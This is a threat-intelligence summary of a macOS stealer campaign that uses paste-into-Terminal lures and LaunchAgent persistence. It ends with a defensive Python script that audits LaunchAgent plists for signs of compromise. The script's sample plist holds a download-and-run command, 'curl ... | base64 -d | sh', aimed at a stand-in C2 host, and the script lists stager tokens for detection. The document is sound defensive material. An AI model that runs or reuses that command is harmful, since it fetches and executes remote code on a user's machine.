Malware Insights: macOS Phexia Campaign
- #Botnet Campaign
- #macOS Malware
- #APT28
- A macOS Phexia campaign uses a ClickFix attack: a compromised website tricks the user into copying (Cmd+C) a malicious command and pasting (Cmd+V) it into Terminal, where it executes.
- The malware employs a multi-stage attack: Stage 1 installs a LaunchAgent for persistence, Stage 2 connects to C2 servers and receives domain updates via a Telegram bot, Stage 3 gathers the machine UUID, username and password via deceptive dialogs, and Stage 4 deploys the Phexia Stealer.
- The Phexia Stealer targets crypto wallets, browsers, password extensions, keychains, cookies, history, and Telegram auth data on macOS, with C2 domains hosted on vdsina.com VPS servers behind Cloudflare.
- The campaign is linked to the Amatera botnet and potentially to APT28, with a focus on Ukrainian networks; its PHP-based C2 servers run on Apache/Ubuntu with multiple open ports, possibly portspoof used for obfuscation.
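The Stage 1 persistence described above is a LaunchAgent, which defenders can hunt for in the per-user LaunchAgents directory. The script below is an added example, not code from the report or the campaign: it parses a plist and flags stager-like traits (an inline `sh -c` command, download-and-decode tokens, an Apple-looking label in a user-installed agent). The heuristics, label regex and `SAMPLE_PLIST` are constructed assumptions, not campaign indicators.

```python
# Added example (not code from the report or the campaign): audit LaunchAgent plists,
# the persistence mechanism Stage 1 uses, for stager-like traits. All heuristics,
# the label regex and SAMPLE_PLIST below are constructed assumptions, not IoCs.
import plistlib
import re
from pathlib import Path

# Tokens common in download-and-execute stagers (heuristic list, an assumption).
SUSPICIOUS_TOKENS = ("curl ", "base64", "osascript", "nohup ", "/tmp/", "| sh", "| bash")
SHELLS = ("/bin/sh", "/bin/bash", "/bin/zsh", "sh", "bash", "zsh")

def audit_launch_agent(plist_bytes: bytes) -> dict:
    """Parse one plist; return its label, a verdict and the reasons behind it."""
    agent = plistlib.loads(plist_bytes)
    label = agent.get("Label", "")
    args = agent.get("ProgramArguments") or [agent.get("Program", "")]
    cmdline = " ".join(args)
    strong, weak = [], []
    if args[0] in SHELLS and "-c" in args:
        strong.append("wraps an inline shell command via '<shell> -c'")
    hits = [t for t in SUSPICIOUS_TOKENS if t in cmdline]
    if hits:
        strong.append("command line contains " + ", ".join(repr(t) for t in hits))
    if label.startswith("com.apple."):
        strong.append("user-installed agent borrows Apple's com.apple. namespace")
    if agent.get("RunAtLoad"):
        weak.append("RunAtLoad: starts at every login")
    if agent.get("KeepAlive"):
        weak.append("KeepAlive: relaunched if the process dies")
    if not re.fullmatch(r"[A-Za-z0-9-]+(\.[A-Za-z0-9-]+){2,}", label):
        weak.append(f"label {label!r} is not reverse-DNS style")
    # Persistence flags alone are normal; only a strong indicator yields a verdict.
    return {"label": label, "suspicious": bool(strong), "reasons": strong + weak}

def audit_user_agents(home: Path = Path.home()) -> list:
    """Sweep ~/Library/LaunchAgents; return (path, result) for flagged agents."""
    flagged = []
    for path in (home / "Library" / "LaunchAgents").glob("*.plist"):
        try:
            result = audit_launch_agent(path.read_bytes())
        except Exception:  # unparsable plist: skip it rather than abort the sweep
            continue
        if result["suspicious"]:
            flagged.append((str(path), result))
    return flagged

# Constructed sample resembling a download-and-run stager; not a campaign artifact.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?><plist version="1.0"><dict>
<key>Label</key><string>com.apple.update-helper</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>curl -s http://c2.example.invalid/p | base64 -d | sh</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>"""
```

Run `audit_user_agents()` on a macOS host to list flagged agents; a hit is a lead for triage, not proof of compromise, since some installers legitimately wrap a shell command.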